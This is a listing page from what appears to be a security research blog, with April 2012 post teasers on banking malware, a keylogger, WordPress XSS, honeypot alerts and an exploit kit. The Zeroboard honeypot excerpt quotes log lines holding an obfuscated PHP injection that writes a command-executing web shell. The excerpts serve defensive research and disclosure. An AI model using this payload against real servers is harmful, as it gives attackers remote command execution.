Showing 11 results for: April 2012 ×Security Research ×

Brazilian Banking Malware: Pay Your Bill Slacker!

I recently got wind of an interesting little sample that I believe originated as part of a Brazilian phishing attack. The sample appears to still be quite unknown, as VirusTotal reports currently (VirusTotal Report) reports the sample as being detected...

Pwning a Spammer's Keylogger

Recently, while scrounging around our spam traps, I spotted this ordinary piece of malicious spam. It uses a very simple social engineering trick, speculating about Obama's sexual orientation and a link to a supposed picture to prove it. There was...

WordPress 3.3.2 Addresses Setup XSS Vulnerabilities

Back in January we released a security advisory for WordPress, which included four vulnerabilities in the installation scripts. After discussing these issues with the WordPress team, it was decided that the vulnerabilities were not going to be fixed immediately in...

Come and Join Us at InfoSecurity

This week we will be presenting and speaking at InfoSecurity, Europe's No.1 Information Security event (April 24th - 26th). We'll have our stand ready, marked D20, with materials and a small amphitheatre where I will be giving presentations on various...

[Honeypot Alert] Joomla com_s5clanroster Local File Inclusion Attacks

Our web honeypots picked up some increased scanning for the following Exploit-DB vulnerability: ================================================================================================================== [o] Joomla Component S5 Clan Roster Local File Inclusion Vulnerability Software : com_s5clanroster Vendor : http://www.shape5.com Author : AntiSecurity [ s4va Vrs-hCk NoGe OoN_BoY Paman zxvf...

TrustKeeper Scan Engine Update

TrustKeeper Scan Engine is the scanner that powers Trustwave's Vulnerability Scanning Services, which help organizations around the world find vulnerabilities in their network environments. It also happens to be a key component of the TrustKeeper service that is used by...

[Honeypot Alert] Zeroboard now_connect() Remote Code Execution Attacks

Our web honeypots recently identified attacks for CVE-2009-4834 which is a vulnerability within Zeroboard: 123.140.193.150 - - [09/Apr/2012:20:11:19 +0900] "GET http://host_removed/admin/access_log/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 304 123.140.193.150 - - [09/Apr/2012:20:11:23 +0900] "GET http://host_removed/zboard.php?id=test/lib.php?REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1 HTTP/1.1" 404 290 123.140.193.150 - - [09/Apr/2012:20:11:27 +0900] "GET...

A New Neighbor in Town: The Nuclear Pack v2.0 Exploit Kit

In the past few years, cybercriminals have been increasingly using exploit kits to spread malware. Today, several exploit kits, primarily Blackhole and Phoenix, dominate this market but occasionally we do find other rare ones that are being deployed. We would...